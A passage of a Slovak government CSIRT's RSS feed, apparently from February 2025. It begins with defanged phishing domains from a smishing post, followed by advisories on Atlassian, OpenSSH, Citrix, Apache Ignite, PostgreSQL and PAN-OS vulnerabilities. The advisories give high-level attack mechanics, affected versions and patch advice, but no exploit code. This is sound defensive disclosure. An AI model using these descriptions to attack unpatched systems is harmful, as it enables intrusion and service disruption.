<li>obnovy-365bank[.]com</li>



<li>mojpostova[.]com</li>



<li>renewai-rs-pretplata[.]com</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.resecurity.com/blog/article/smishing-triad-targeted-usps-and-us-citizens-for-data-theft?&amp;web_view=true">https://www.resecurity.com/blog/article/smishing-triad-targeted-usps-and-us-citizens-for-data-theft?&amp;web_view=true</a></li>



<li><a href="https://krebsonsecurity.com/2025/02/how-phished-data-turns-into-apple-google-wallets/">https://krebsonsecurity.com/2025/02/how-phished-data-turns-into-apple-google-wallets/</a></li>



<li><a href="https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay">https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay</a></li>



<li><a href="https://www.joesandbox.com/analysis/1613184/0/html">https://www.joesandbox.com/analysis/1613184/0/html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2122/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – január 2025</title>
		<link>/posts/2064</link>
					<comments>/posts/2064#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 25 Feb 2025 16:12:19 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2064</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci január 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci január 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií   zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/02/MS202501.pdf" data-type="link" data-id="/wp-content/uploads/2025/02/MS202412.pdf">Mesačná správa – 01/2025 PDF (1 395 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2064/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Atlassian opravuje kritické zraniteľnosti viacerých produktov</title>
		<link>/posts/2062</link>
					<comments>/posts/2062#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 21 Feb 2025 14:14:33 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Atlassian]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2062</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/atlassian-logo-4139587245-1024x724.jpg" alt="" /></p>Spoločnosť Atlassian vydala bezpečnostné aktualizácie na svoje produkty Confluence, Bamboo, Bitbucket, Crowd a Jira, ktoré opravujú 7 zraniteľností, z čoho...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/atlassian-logo-4139587245-1024x724.jpg" alt="" /></p>
<p><strong>Spoločnosť Atlassian vydala bezpečnostné aktualizácie na svoje produkty Confluence, Bamboo, Bitbucket, Crowd a Jira, ktoré opravujú 7 zraniteľností, z čoho 3 sú označené ako kritické. Kritické zraniteľnosti v Confluence a Crowd je možné zneužiť na vzdialené vykonanie kódu a obídenie mechanizmov autentifikácie. Ostatné zraniteľnosti je možné zneužiť na zneprístupnenie služby.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li><strong>Bamboo Data Center a&nbsp;Server</strong> – verzie 9.1.2 až 9.1.3, 9.2.3 až 9.2.20 (LTS), 9.3.0 až 9.3.6, 9.4.0 až 9.4.4, 9.5.0 až 9.5.4, 9.6.0 až 9.6.9 (LTS), 10.0.0 až 10.0.3, 10.1.0 až 10.1.1, 10.2.0 (LTS)</li>



<li><strong>Bitbucket Data Center a Server</strong> – verzie 8.6.4, 8.7.3 až 8.7.5, 8.8.2 až 8.8.7, 8.9.0 až 8.9.20 (LTS), 8.10.0 až 8.10.6, 8.11.0 až 8.11.6, 8.12.0 až 8.12.6, 8.13.0 až 8.13.6, 8.14.0 až 8.14.6, 8.15.0 až 8.15.5, 8.16.0 až 8.16.4, 8.17.0 až 8.17.2, 8.18.0 až 8.18.1, 8.19.0 až 8.19.10 (LTS), 9.0.0 až 9.0.1, 9.1.0 až 9.1.1, 9.2.0 až 9.2.1</li>



<li><strong>Confluence Data Center a Server</strong> – verzie 7.19.6 až 7.19.30 (LTS), 8.1.1 až 8.1.4, 8.2.0 až 8.2.3, 8.3.0 až 8.3.4, 8.4.0 až 8.4.5, 8.5.0 až 8.5.18 (LTS), 8.6.0 až 8.6.2, 8.7.1 až 8.7.2, 8.8.0 až 8.8.1, 8.9.0 až 8.9.8, 9.0.1 až 9.0.3, 9.1.0 až 9.1.1, 9.2.0 (LTS)</li>



<li><strong>Crowd Data Center a Server</strong> – verzie 5.3.0 až 5.3.6, 6.0.1 až 6.0.6, 6.1.0 až 6.1.3, 6.2.0</li>



<li><strong>Jira Data Center a Server</strong> – verzie 9.4.4 až 9.4.27 (LTS), 9.7.0 až 9.7.2, 9.8.0 až 9.8.2, 9.9.0 až 9.9.2, 9.10.0 až 9.10.2, 9.11.0 až 9.11.3, 9.12.0 až 9.12.14 (LTS), 9.13.0 až 9.13.1, 9.14.0 až 9.14.1, 9.15.2, 9.16.1, 9.17.0 až 9.17.3, 10.0.0 až 10.0.1, 10.1.1</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong><u>Bamboo Data Center a&nbsp;Server</u></strong></p>



<p><strong>CVE-2024-7254 </strong>(CVSS skóre 8,7)</p>



<p>Pokiaľ projekt parsuje údaje z&nbsp;nedôveryhodných Protocol Buffers, môže dôjsť ku pretečeniu zásobníka pri niektorých atribútoch (groups, tags). Chyba sa nachádza v&nbsp;parseroch DiscardUnknownFieldsParser, Java Protobuf Lite a&nbsp;Protobuf. Úspešným zneužitím môže útočník spôsobiť nedostupnosť služby. Zraniteľnosť súvisí s&nbsp;komponentom com.google.protobuf:protobuf-java.</p>



<p><strong>CVE-2024-47072 </strong>(CVSS skóre 7,5)</p>



<p>Ak nástroj XStream na serializáciu a&nbsp;deserializáciu objektov do a z XML používa BinaryStreamDriver, útočník môže podvrhnúť vstupný prúd dát, ktorý spôsobí pretečenie zásobníka a&nbsp;vyvolá nedostupnosť služby. Zraniteľnosť súvisí s&nbsp;komponentom com.thoughtworks.xstream:xstream.</p>



<p><strong><u>Bitbucket Data Center a&nbsp;Server</u></strong></p>



<p><strong>CVE-2024-47561 </strong>(CVSS skóre 7,3)</p>



<p>Zraniteľnosť v&nbsp;komponente org.apache.avro:avro umožňuje neautentifikovanému útočníkovi pri parsovaní schém v&nbsp;Java SDK pre Apache Avro vzdialene vykonávať kód.</p>



<p><strong><u>Confluence Data Center a&nbsp;Server</u></strong></p>



<p><strong>CVE-2024-50379 </strong>(CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť sa nachádza v komponente org.apache.tomcat:tomcat-catalina a&nbsp;súvisí s&nbsp;súbehom typu TOCTOU pri kompilácii JSP v Apache Tomcat. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie kódu na case-insensitive súborových systémoch s&nbsp;povoleným zápisom pre štandardný servlet. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.</p>



<p><strong>CVE-2024-56337 </strong>(CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť sa nachádza v komponente org.apache.tomcat:tomcat-catalina a&nbsp;súvisí s&nbsp;súbehom typu TOCTOU v Apache Tomcat. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie kódu na case-insensitive súborových systémoch s&nbsp;povoleným zápisom pre štandardný servlet. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.</p>



<p><strong><u>Crowd Data Center a&nbsp;Server</u></strong></p>



<p><strong>CVE-2024-52316 </strong>(CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť sa nachádza v komponente org.apache.tomcat:tomcat-catalina a&nbsp;súvisí s&nbsp;neošetrenou chybou autentifikácie, ktorá môže nastať, keď Apache Tomcat používa komponent Jakarta Authentication ServerAuthContext. Vzdialený neautentifikovaný útočník by ju mohol zneužiť obídenie autentifikačného mechanizmu. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.</p>



<p><strong>CVE-2022-25927 </strong>(CVSS skóre 7,5)</p>



<p>Zraniteľnosť v&nbsp;komponente ua-parser.js umožňuje neautentifikovanému útočníkovi vyvolať nedostupnosť služby.</p>



<p>Crowd Data Center a&nbsp;Server obsahuje aj zraniteľnosti CVE-2024-50337 (CVSS skóre 9,8) a CVE-2024-50379 (CVSS skóre 9,8), popísané vyššie.</p>



<p><strong><u>Jira Data Center a Server</u></strong></p>



<p>V Jira Data Center a Server bola opravená zraniteľnosť CVE-2024-7254 (CVSS skóre 8,7), popísaná vyššie.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Zneprístupnenie služby (DoS)</strong></li>



<li><strong>Neautorizovaný prístup do systému</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia aspoň na:</p>



<ul>
<li>Bamboo Data Center a Server – verzie 9.6.10 (LTS) a 10.2.1 (LTS) [iba DC], alebo 9.2.21 a 9.2.22 [DC aj Server]</li>



<li>Bitbucket Data Center a Server – verzie 8.19.11 až 8.19.15 (LTS), 9.4.3 (LTS) a 9.5.1 [iba DC], alebo 8.9.21 až 8.9.25 (LTS) [DC aj Server]</li>



<li>Confluence Data Center a Server – verzie 9.2.1 (LTS) a 9.3.1 [iba DC], alebo 8.5.19 (LTS) [DC aj Server]</li>



<li>Crowd Data Center a Server – verzie 6.0.7, 6.1.4 a 6.2.2 [iba DC]</li>



<li>Jira Data Center a Server – verzie 9.12.15 (LTS), 9.17.4, 9.17.5 a 10.1.2 [iba DC], alebo 9.4.28 až 9.4.30 (LTS) [DC aj Server]</li>
</ul>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://confluence.atlassian.com/security/security-bulletin-february-18-2025-1510670627.html">https://confluence.atlassian.com/security/security-bulletin-february-18-2025-1510670627.html</a></li>



<li><a href="https://jira.atlassian.com/browse/BAM-26027">https://jira.atlassian.com/browse/BAM-26027</a></li>



<li><a href="https://jira.atlassian.com/browse/BAM-26010">https://jira.atlassian.com/browse/BAM-26010</a></li>



<li><a href="https://jira.atlassian.com/browse/BSERV-19827">https://jira.atlassian.com/browse/BSERV-19827</a></li>



<li><a href="https://jira.atlassian.com/browse/CONFSERVER-99215">https://jira.atlassian.com/browse/CONFSERVER-99215</a></li>



<li><a href="https://jira.atlassian.com/browse/CONFSERVER-99216">https://jira.atlassian.com/browse/CONFSERVER-99216</a></li>



<li><a href="https://jira.atlassian.com/browse/CWD-6335">https://jira.atlassian.com/browse/CWD-6335</a></li>



<li><a href="https://jira.atlassian.com/browse/CWD-6316">https://jira.atlassian.com/browse/CWD-6316</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2062/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Závažné zraniteľnosti OpenSSH</title>
		<link>/posts/2058</link>
					<comments>/posts/2058#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 20 Feb 2025 13:39:29 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<guid isPermaLink="false">/?p=2058</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/02/opensshf-1024x724.jpg" alt="" /></p>Vývojári OpenSSH vydali bezpečnostné aktualizácie, ktoré opravujú dve zraniteľnosti umožňujúce realizáciu útokov typu man-in-the-middle a zneprístupnenie služby. Úspešným zneužitím zraniteľností...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/02/opensshf-1024x724.jpg" alt="" /></p>
<p><strong>Vývojári OpenSSH vydali bezpečnostné aktualizácie, ktoré opravujú dve zraniteľnosti umožňujúce realizáciu útokov typu man-in-the-middle a zneprístupnenie služby. Úspešným zneužitím zraniteľností môže útočník získať prístup k&nbsp;citlivým informáciám a&nbsp;prevziať kontrolu nad SSH reláciou.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>OpenSSH 6.8p1 až 9.9p1</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-26465</strong> (CVSS skóre 6,8)</p>



<p>Zraniteľnosť spočíva v bližšie nešpecifikovanom probléme so spracovaním chybových stavov, ktorú možno na inštanciách s aktivovaným nastavením VerifyHostKeyDNS („yes“ alebo „ask“) zneužiť na útok typu MitM. Zneužitie zraniteľnosti nevyžaduje interakciu používateľa a nezáleží na existencii DNS záznamu SSHFP. Útočník môže impersonovať ľubovoľný server a vložiť do zachytenej komunikácie SSH svoj špeciálne upravený kľúč. Tým môže spôsobiť zahltenie pamäte klienta, obísť overenie hostiteľa a prevziať kontrolu nad reláciou. Môže tak získať prístup k citlivým údajom a možnosť vykonávať príkazy.</p>



<p><strong>CVE-2025-26466</strong> (CVSS skóre 5,9)</p>



<p>Zraniteľnosť spočíva v neobmedzenej alokácii operačnej pamäte, ktorú možno zneužiť na zahltenie dostupných prostriedkov a zneprístupnenie služby. Útočník ju dokáže zneužiť pred autentifikáciou, napríklad zasielaním 16-bajtových paketov SSH2_MSG_PING, na ktoré systém odpovie 256-bajtovými správami, ktoré počas výmeny kľúčov ukladá do pamäte na neobmedzenú dobu.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Nedostupnosť služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia OpenSSH aspoň na verziu 9.9p2. Vývojári odporúčajú tiež zakázať VerifyHostKeyDNS, pokiaľ ho nevyhnutne nepotrebujete, a nastaviť limity pripojení (napríklad pomocou funkcií LoginGraceTime, MaxStartups alebo PerSourcePenalties).</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.openssh.com/releasenotes.html">https://www.openssh.com/releasenotes.html</a></li>



<li><a href="https://blog.qualys.com/vulnerabilities-threat-research/2025/02/18/qualys-tru-discovers-two-vulnerabilities-in-openssh-cve-2025-26465-cve-2025-26466">https://blog.qualys.com/vulnerabilities-threat-research/2025/02/18/qualys-tru-discovers-two-vulnerabilities-in-openssh-cve-2025-26465-cve-2025-26466</a></li>



<li><a href="https://www.qualys.com/2025/02/18/openssh-mitm-dos.txt">https://www.qualys.com/2025/02/18/openssh-mitm-dos.txt</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-26465">https://nvd.nist.gov/vuln/detail/CVE-2025-26465</a></li>



<li><a href="https://www.tenable.com/cve/CVE-2025-26466">https://www.tenable.com/cve/CVE-2025-26466</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/new-openssh-flaws-expose-ssh-servers-to-mitm-and-dos-attacks/">https://www.bleepingcomputer.com/news/security/new-openssh-flaws-expose-ssh-servers-to-mitm-and-dos-attacks/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2058/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Závažná zraniteľnosť Citrix NetScaler Console a Agent</title>
		<link>/posts/2055</link>
					<comments>/posts/2055#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 20 Feb 2025 13:35:54 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Citrix]]></category>
		<category><![CDATA[NetScaler]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<guid isPermaLink="false">/?p=2055</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/07/citrix-logo.png" alt="" /></p>Spoločnosť Citrix vydala bezpečnostné aktualizácie pre svoje produkty NetScaler Console a NetScaler Agent, ktoré opravujú vysoko závažnú zraniteľnosť. Táto umožňuje...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/07/citrix-logo.png" alt="" /></p>
<p><strong>Spoločnosť Citrix vydala bezpečnostné aktualizácie pre svoje produkty NetScaler Console a NetScaler Agent, ktoré opravujú vysoko závažnú zraniteľnosť. Táto umožňuje autentifikovanému útočníkovi eskalovať svoje privilégiá a vzdialene vykonávať príkazy.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>NetScaler Console a NetScaler Agent 14.1 staršie ako 14.1-38.53</li>



<li>NetScaler Console a NetScaler Agent 13.1 staršie ako 13.1-56.18</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-12284</strong> (CVSS skóre 8,8)</p>



<p>Vysoko závažná zraniteľnosť CVE-2024-12284 spočíva v nesprávnom manažmente privilégií a autentifikovaný útočník s&nbsp;prístupom ku zraniteľnému systému by ju mohol zneužiť na eskaláciu privilégií a vzdialené vykonanie príkazov.</p>



<p>Riešenia, ktoré manažuje spoločnosť Citrix, boli už zabezpečené. Opravnú aktualizáciu vyžadujú lokálne manažované inštancie NetScaler Console a Agent. </p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia oprávnení</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia NetScaler Console a NetScaler Agent aspoň n verziu 13.1-56.18 alebo 14.1-38.53.</p>



<p>Odporúčame tiež nakonfigurovať svoju inštanciu NetScaler Console a&nbsp;NetScaler Agent podľa odporúčaní publikovaných na <a href="https://docs.netscaler.com/en-us/netscaler-adc-secure-deployment/best-practices-for-netscaler-console-security.html">stránkach výrobcu</a><strong>.</strong></p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://support.citrix.com/s/article/CTX692579-netscaler-console-and-netscaler-agent-security-bulletin-for-cve202412284?language=en_US">https://support.citrix.com/s/article/CTX692579-netscaler-console-and-netscaler-agent-security-bulletin-for-cve202412284?language=en_US</a></li>



<li><a href="https://www.netscaler.com/blog/news/cve-2024-12284-high-severity-security-update-for-netscaler-console/">https://www.netscaler.com/blog/news/cve-2024-12284-high-severity-security-update-for-netscaler-console/</a></li>



<li><a href="https://docs.netscaler.com/en-us/netscaler-adc-secure-deployment/best-practices-for-netscaler-console-security.html">https://docs.netscaler.com/en-us/netscaler-adc-secure-deployment/best-practices-for-netscaler-console-security.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2055/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v distribuovanej databáze Apache Ignite</title>
		<link>/posts/2049</link>
					<comments>/posts/2049#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 20 Feb 2025 09:29:01 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[Apache Ignite]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2049</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/02/apache_ignite_logo.png" alt="" /></p>Vývojári distribuovanej databázy Apache Ignite vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. CVE-2024-52577 by vzdialený neautentifikovaný útočník mohol...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/02/apache_ignite_logo.png" alt="" /></p>
<p><strong>Vývojári distribuovanej databázy Apache Ignite vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. CVE-2024-52577</strong> <strong>by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Apache Ignite vo verziách 2.6.0 až po 2.17.0</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-52577</strong><strong> </strong>(CVSS v4.0 skóre 9,5)</p>



<p>Kritická zraniteľnosť spočíva v nedostatočnej implementácii Class Serialization Filters, ktoré sú na viacerých koncových bodoch Ignite ignorované, čo umožňuje deserializáciu nebezpečných objektov. Zraniteľnosť by vzdialený neautentifikovaný útočník zaslaním špeciálne vytvorených správ Ignite mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>. Zneužitie zraniteľnosti vyžaduje, aby správy Ignite obsahovali zraniteľný objekt, ktorého trieda je prítomná v tzv. classpath zraniteľného Ignite servera.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu zraniteľných Apache Ignite na verziu 2.17.0 alebo novšiu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://lists.apache.org/thread/1bst0n27m9kb3b6f6hvlghn182vqb2hh">https://lists.apache.org/thread/1bst0n27m9kb3b6f6hvlghn182vqb2hh</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-52577">https://nvd.nist.gov/vuln/detail/CVE-2024-52577</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2049/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť v databázovom systéme PostgreSQL</title>
		<link>/posts/2045</link>
					<comments>/posts/2045#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 17 Feb 2025 14:45:20 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[PostgreSQL]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2045</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/PostgreSQL-Logo-1024x640.png" alt="" /></p>Vývojári databázového systému PostgreSQL vydali bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť vysokej závažnosti. CVE-2025-1094 vo viacerých funkciách libpq...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/PostgreSQL-Logo-1024x640.png" alt="" /></p>
<p><strong>Vývojári databázového systému PostgreSQL vydali bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť vysokej závažnosti. CVE-2025-1094 vo viacerých funkciách libpq možno zneužiť na vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>PostgreSQL 17.X vo verziách starších ako 17.3</li>



<li>PostgreSQL 16.X vo verziách starších ako 16.7</li>



<li>PostgreSQL 15.X vo verziách starších ako 15.11</li>



<li>PostgreSQL 14.X vo verziách starších ako 14.16</li>



<li>PostgreSQL 13.X vo verziách starších ako 13.19</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-1094 </strong>(CVSS skóre 8,1)</p>



<p>CVE-2025-1094 spočívajúcu v nesprávnej neutralizácii syntaxe úvodzoviek vo viacerých funkciách libpq a&nbsp;príkazovom riadku by vzdialený neautentifikovaný útočník prostredníctvom <strong>SQL injekcie</strong> vedúcej k zneužitiu funkcionality pre spúšťanie metapríkazov mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong>Zraniteľnosť je možné zneužiť len pri špecifickej konfigurácii systémov</strong>:</p>



<ul>
<li>výstupy libpq funkcií sú používané ako vstupy do psql (interaktívny terminál PostgreSQL)</li>



<li>súčasné nastavení client_encoding na hodnotu BIG5 a&nbsp;server_encoding na hodnoty EUC_TW alebo MULE_INTERNAL.</li>
</ul>



<p><strong>Pozn.: Zraniteľnosť je podľa spoločnosti </strong><a href="https://www.rapid7.com/blog/post/2025/02/13/cve-2025-1094-postgresql-psql-sql-injection-fixed/"><strong>RAPID-7</strong></a><strong> aktívne zneužívaná minimálne od decembra 2024. Jej zneužitie bolo zaznamenané v súvislosti s útokmi zneužívajúcimi zraniteľnosti v&nbsp;produktoch BeyondTrust PRA (Privileged Remote Access) a&nbsp;BeyondTrust RS (Remote Support).</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame vykonať bezodkladnú aktualizáciu zraniteľných systémov na verzie 17.3, 16.7, 15.11, 14.16 alebo 13.19.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.postgresql.org/support/security/CVE-2025-1094/">https://www.postgresql.org/support/security/CVE-2025-1094/</a></li>



<li><a href="https://www.rapid7.com/blog/post/2025/02/13/cve-2025-1094-postgresql-psql-sql-injection-fixed/">https://www.rapid7.com/blog/post/2025/02/13/cve-2025-1094-postgresql-psql-sql-injection-fixed/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2045/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť v operačnom systéme Palo Alto PAN-OS</title>
		<link>/posts/2043</link>
					<comments>/posts/2043#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 17 Feb 2025 14:43:53 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Palo Alto]]></category>
		<guid isPermaLink="false">/?p=2043</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/palo-alto-networks-inc-logo-vector.png" alt="" /></p>Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie pre svoj sieťový operačný systém PAN-OS, ktoré opravujú 4 zraniteľnosti, z ktorých 1...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/palo-alto-networks-inc-logo-vector.png" alt="" /></p>
<p><strong>Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie pre svoj sieťový operačný systém PAN-OS, ktoré opravujú 4 zraniteľnosti, z ktorých 1 je označená ako aktívne zneužívaná. Zraniteľnosti nachádzajúce sa vo webovom manažmentovom rozhraní a plugine OpenConfig možno zneužiť na injekciu príkazov, získanie neoprávneného prístupu k citlivým údajom a vykonanie neoprávnených zmien v systéme. CVE-2025-0108 je podľa spoločnosti GreyNoise v súčasnosti aktívne zneužívaná útočníkmi.</strong></p>



<p><strong>[Aktualizované 20.02.2025]</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>PAN-OS 11.2 vo verziách starších ako 11.2.4-h4</li>



<li>PAN-OS 11.1 vo verziách starších ako 11.1.6-h1</li>



<li>PAN-OS 10.2 vo verziách starších ako 10.2.13-h3</li>



<li>PAN-OS 10.1 vo verziách starších ako 10.1.14-h9</li>



<li>PAN-OS OpenConfig Plugin vo verziách starších ako 2.1.2</li>
</ul>



<p><strong>Pozn.: Cloud NGFW a&nbsp;Prisma Access nie sú zraniteľné.</strong></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-0108 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosť s identifikátorom CVE-2025-0108 spočíva v nesúlade spracovania prichádzajúcich požiadaviek v rámci komponentov nginx a Apache. Vzdialený neautentifikovaný útočník s prístupom k webovému manažmentovému rozhraniu by ju mohol zneužiť na obídenie mechanizmov autentifikácie a <strong>spustenie vybraných PHP skriptov vedúcich k narušeniu dôvernosti a integrity systému</strong>. V prípadoch, keď je prístup k manažmentovému rozhraniu limitovaný len na jump boxy, je zraniteľnosť hodnotená ako stredne závažná.</p>



<p><strong>Pozn.: Na základe informácií od spoločnosti </strong><a href="https://viz.greynoise.io/tags/palo-alto-pan-os-cve-2025-0108-auth-bypass-attempt?days=1"><strong>GreyNoise</strong></a><strong> je zraniteľnosť v&nbsp;súčasnosti aktívne zneužívaná.</strong></p>



<p><strong>CVE-2025-0110 </strong>(CVSS skóre 7,3)</p>



